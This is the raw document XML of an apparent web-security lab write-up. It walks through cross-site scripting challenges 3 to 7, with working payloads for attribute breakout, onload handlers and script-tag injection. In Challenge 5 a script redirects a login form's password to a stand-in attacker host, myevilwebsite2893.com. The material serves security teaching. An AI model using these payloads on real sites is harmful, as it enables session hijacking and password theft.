          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A233827" w14:textId="3691747C" w:rsidR="00491201" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Cause an alert box to pop up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460357BC" w14:textId="77777777" w:rsidR="00491201" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68569825" w14:textId="142E0F08" w:rsidR="00845514" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Protection: The input is injected into an HTML attribute, rather than directly into the DOM (not protection perse, but a difficulty to get around)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6959D746" w14:textId="36A478F0" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC0673A" w14:textId="7767904C" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability: The quotes around attribute values can be closed with a closing double-quote, and attributes can be added to HTML elements to trigger on events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B179EFB" w14:textId="343AE843" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148F65F9" w14:textId="77777777" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation process: I entered “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4C30">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>5)" attr2="</w:t>
      </w:r>
      <w:r>
        <w:t>” into the text input and pressed “Inject!”. This resulted in the HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B2BDF6" w14:textId="486D3A17" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC4C30">
        <w:t xml:space="preserve">&lt;input type="text" value="" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC4C30">
        <w:t>5)" attr2=""&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A6DC8" w14:textId="4335FE58" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">So I closed the value </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attribute, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> added a handler for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> events. Finally, I added an extra </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>attribute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so the quoting worked out without syntax errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B428D" w14:textId="0B103672" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Of course, this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>particular attack</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> requires the user to hover over the element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BBB8EF" w14:textId="66B28728" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F7FDAB" w14:textId="314B2E04" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C311045" w14:textId="7D80FA04" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC4C30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="166CFFAB" wp14:editId="6E98F878">
            <wp:extent cx="2429214" cy="1486107"/>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29214" cy="1486107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58047758" w14:textId="5990589F" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A4B351" w14:textId="06D88D1D" w:rsidR="00FC4C30" w:rsidRDefault="00FC4C30" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD0035" w14:textId="39A57B03" w:rsidR="00491201" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Cause an alert box to pop up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602BFBF" w14:textId="77777777" w:rsidR="00491201" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CAA3859" w14:textId="7BFDE337" w:rsidR="00C13485" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protection: “script” is removed from all input, so </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD715E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD715E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tags will not work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A7168" w14:textId="3EBD610C" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0240E108" w14:textId="5E452041" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability: There are various other ways still permitted by HTML to run JavaScript code. One way is with a body element with the onload attribute set. This will cause the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD715E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript code to execute when the page is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF34AF0" w14:textId="3C8E8D30" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CB4686" w14:textId="0E7D9C48" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation process: I entered “</w:t>
      </w:r>
      <w:r w:rsidRPr="000A7710">
        <w:t>&lt;body onload="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A7710">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A7710">
        <w:t>2348)"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>” in the text field and pressed “Inject!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E140A4" w14:textId="737975D1" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A9D381" w14:textId="0419CAB0" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81867F" w14:textId="4DBEA29E" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000A7710">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4488E50A" wp14:editId="52C7957C">
            <wp:extent cx="2400635" cy="148610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00635" cy="1486107"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="257168CF" w14:textId="6B9934C4" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8A2C06" w14:textId="3D4B198F" w:rsidR="000A7710" w:rsidRDefault="000A7710" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A948BC" w14:textId="619E46A4" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: The goal is to redirect the form’s input (in this case the password) to somewhere else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7B8C4" w14:textId="77777777" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05204CFB" w14:textId="31F9CE5E" w:rsidR="000A7710" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability: JavaScript allows for easy indexing into and manipulation of the DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576EB188" w14:textId="4C9D8FE3" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A5DD5E" w14:textId="0ED6B965" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation process: Entered “</w:t>
      </w:r>
      <w:r w:rsidRPr="00936B2D">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00936B2D">
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00936B2D">
        <w:t>[1].action = "http://www.myevilwebsite2893.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00936B2D">
        <w:t>steal_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00936B2D">
        <w:t>"&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>” in the text field and pressed “Inject!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92FDFA" w14:textId="4826590E" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023343E2" w14:textId="1D680F5A" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Screenshot: When I press the “Submit Query” button I’m redirected to </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.myevilwebsite2893.com/steal_password?password=mysecretword</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A2707" w14:textId="3C21B2AF" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00936B2D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49798F5B" wp14:editId="373DBDEA">
            <wp:extent cx="5943600" cy="20586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058670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0A5E2" w14:textId="5AEC6E60" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B532E85" w14:textId="5586B51A" w:rsidR="00936B2D" w:rsidRDefault="00936B2D" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE841B" w14:textId="4B9F1517" w:rsidR="00491201" w:rsidRPr="00993907" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00993907">
        <w:t>Goal: Cause an alert box to pop up, with your input being placed in a JavaScript string literal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563C0283" w14:textId="57393129" w:rsidR="00491201" w:rsidRPr="00993907" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673DEA63" w14:textId="5DCB8CCA" w:rsidR="00993907" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00993907">
        <w:t>Protection: Double quotes are not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4F753" w14:textId="3EF1121B" w:rsidR="007C65E5" w:rsidRDefault="007C65E5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41505F50" w14:textId="38101BCA" w:rsidR="007C65E5" w:rsidRPr="00993907" w:rsidRDefault="007C65E5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability: We can just close the first script tag and inject a separate one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22B70A" w14:textId="0AD4EC27" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25744ED7" w14:textId="09A2413C" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation process: Entered “</w:t>
      </w:r>
      <w:r w:rsidRPr="00993907">
        <w:t>&lt;/script&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00993907">
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00993907">
        <w:t>/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>” in the text field and pressed “Inject!”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868D9EB" w14:textId="197D09CE" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120E1E2D" w14:textId="77777777" w:rsidR="00DD715E" w:rsidRDefault="00DD715E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEDD9DB" w14:textId="127E4AF4" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Resulting HTML in browser inspector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D133507" w14:textId="310B4E3A" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00993907">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19C4D406" wp14:editId="2F06B290">
            <wp:extent cx="2572109" cy="165758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72109" cy="1657581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2F075" w14:textId="3C8FA4B3" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DAE4BF4" w14:textId="4C791E48" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Alert screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B9F46" w14:textId="60F1A461" w:rsidR="00993907" w:rsidRDefault="00993907" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00993907">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="313BF535" wp14:editId="643AAF2B">
            <wp:extent cx="4582164" cy="1505160"/>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82164" cy="1505160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D71CA" w14:textId="32A30915" w:rsidR="00491201" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33A03509" w14:textId="078D2E75" w:rsidR="00491201" w:rsidRDefault="00491201" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C0503" w14:textId="789A2E0A" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Goal: Cause an alert box to display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE528DF" w14:textId="6B5DDAEF" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA5008F" w14:textId="721D2069" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Protection: “&gt;” not permitted, injecting into an HTML attribute, the HTML element is hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A79962" w14:textId="627158AC" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3163BA7E" w14:textId="1B3812FD" w:rsidR="004D4151" w:rsidRDefault="002074FC" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="004D4151">
        <w:t xml:space="preserve">: I can close the </w:t>
      </w:r>
      <w:r w:rsidR="004D4151" w:rsidRPr="004D4151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="004D4151">
        <w:t xml:space="preserve"> attribute value that is being injected into with a closing double quote. Then I can set an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D4151" w:rsidRPr="004D4151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D4151">
        <w:t xml:space="preserve"> event handler that will display the alert. Finally, to prevent the HTML element from being hidden, I can add “ignored=” to eat the </w:t>
      </w:r>
      <w:r w:rsidR="004D4151" w:rsidRPr="004D4151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="004D4151">
        <w:t xml:space="preserve"> attribute, and then </w:t>
      </w:r>
      <w:r w:rsidR="004D4151" w:rsidRPr="004D4151">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>type="hidden"</w:t>
      </w:r>
      <w:r w:rsidR="004D4151">
        <w:t xml:space="preserve"> will not be part of the HTML for the HTML element anymore, making it visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D60B2F" w14:textId="77777777" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FADEA2D" w14:textId="3F7334F7" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit process: I entered “</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4151">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4151">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4151">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4151">
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4151">
        <w:t xml:space="preserve">1)" </w:t>
      </w:r>
      <w:r>
        <w:t>ignored</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4151">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>” into the text input, and pressed “Inject!”</w:t>
      </w:r>
      <w:r w:rsidR="00CA35B5">
        <w:t xml:space="preserve"> On the following page, I then hovered my mouse over the text input, and this caused the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA35B5" w:rsidRPr="00CA35B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA35B5">
        <w:t xml:space="preserve"> event to fire, displaying the alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC811D" w14:textId="54E223D4" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D25B156" w14:textId="38782DE5" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>HTML result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585732B" w14:textId="0F07D457" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="004D4151">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17ED828A" wp14:editId="0DB5B5B0">
            <wp:extent cx="4486901" cy="1057423"/>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86901" cy="1057423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69D84F" w14:textId="093F303C" w:rsidR="004D4151" w:rsidRDefault="004D4151" w:rsidP="00035293">
      <w:pPr>
